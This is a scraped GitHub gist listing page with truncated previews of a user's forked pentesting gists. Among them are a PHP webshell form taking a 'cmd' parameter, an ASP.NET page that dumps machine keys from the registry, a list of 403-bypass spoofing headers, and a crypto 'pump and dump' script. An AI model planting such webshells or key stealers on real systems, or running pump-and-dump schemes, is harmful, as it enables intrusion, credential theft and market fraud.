Hi dear reader, there are very few technical network security assessment checklist. So I thought to share my own on this. Have a look and enjoy. Lets talk about the scope first. If you are given a 1000 machines to perform VAPT, then here is your scope. Single machine can have 65535 ports open. Any single port can deploy any service software from the world. For example FTP can be run on smartftp, pureftpd etc.. Any single FTP software version (for example pureftpd 1.0.22) can have number of vulnerabilities available. So if you multiply all of these, then it is impossible for any auditor to go ahead and probe all ports manually and find services manually. Even if he/she is able to do it, it is impossible to check all vulnerabilities that are pertaining to a single port of a single machine. Hence we have to rely on scanners such as nexpose, nessus, openvas, coreimpact etc. Here are some quick tools and test cases that one can perform on commonly found ports in the network pentest.
JeffreyShran
/ simple-https-server.py
Created
May 4, 2022 11:52
— forked from DannyHinshaw/simple-https-server.py
View simple-https-server.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.pem with the following command: | |
| # openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import http.server |
JeffreyShran
/ machineKeyFinder.aspx
Created
March 30, 2022 10:00
— forked from irsdl/machineKeyFinder.aspx
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
View machineKeyFinder.aspx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %> | |
| <% | |
| // Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
| Response.Write("<br/><hr/>"); | |
| byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
| if(autoGenKeyV4!=null) | |
| Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
| Response.Write("<br/>"); | |
| byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
| if(autoGenKey!=null) |
JeffreyShran
/ easy-simple-php-webshell.php
Created
February 2, 2022 09:12
— forked from joswr1ght/easy-simple-php-webshell.php
View easy-simple-php-webshell.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { |
JeffreyShran
/ NetSecCheck.md
Created
November 24, 2021 15:17
— forked from MrMugiwara/NetSecCheck.md
Network Security VAPT Checklist
JeffreyShran
/ 403_401_oauth_HeadersBypass.txt
Created
September 22, 2021 14:40
— forked from 0xrd/403_401_oauth_HeadersBypass.txt
403Bypass
View 403_401_oauth_HeadersBypass.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CF-Connecting-IP: 127.0.0.1 | |
| Content-type: 0 | |
| Fastly-Client-IP: 127.0.0.1 | |
| Forwarded: 127.0.0.1 | |
| Forwarded: for=127.0.0.1 | |
| Forwarded-For: 127.0.0.1 | |
| Forwarded-For-Ip: 127.0.0.1 | |
| True-Client-IP: 127.0.0.1 | |
| X-Client-IP: 127.0.0.1 | |
| X-Cluster-Client-IP: 127.0.0.1 |
JeffreyShran
/ pump_dump.py
Created
February 21, 2021 14:42
— forked from talesa/pump_dump.py
Short script to for pump and dumps, you have to execute this code line by line so use `jupyter notebook` or `hydrogen` inside `atom` editor
View pump_dump.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # you have to execute this code line by line so use jupyter notebook or hydrogen inside atom editor | |
| # import libraries | |
| import ccxt | |
| from datetime import datetime | |
| # create exchange API handle | |
| exchange = getattr(ccxt, 'binance')() | |
| # paste in your API key and secret here (if you're afraid they're gonna get stolen, inspect the ccxt library open source code on github) | |
| exchange.apiKey = '' |
JeffreyShran
/ bb-foxyproxy-pattern.json
Created
June 24, 2020 09:30
— forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
View bb-foxyproxy-pattern.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |
JeffreyShran
/ screen.py
Created
June 16, 2020 11:04
— forked from si9int/screen.py
Performing screenshots on URLS given via STDIN. Chromium and Chromedriver required! Configuration infile.
View screen.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # v.0.1 - by SI9INT (https://si9int.sh) | |
| # Chromium and chromedriver required, be sure to check if both version are the same | |
| # `mkdir screens` to get started, script won't create the folder | |
| import queue, threading, sys | |
| from selenium import webdriver | |
| from selenium.webdriver.chrome.options import Options | |
| CHROME_PATH = '/usr/bin/chromium' |
JeffreyShran
/ bad_proxies
Created
March 27, 2020 13:56
View bad_proxies
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 202.93.224.226 |
JeffreyShran
/ WAHH_Task_Checklist.md
Created
February 21, 2020 10:38
— forked from gbedoya/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
View WAHH_Task_Checklist.md
The Web Application Hacker's Handbook
Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
Contents
NewerOlder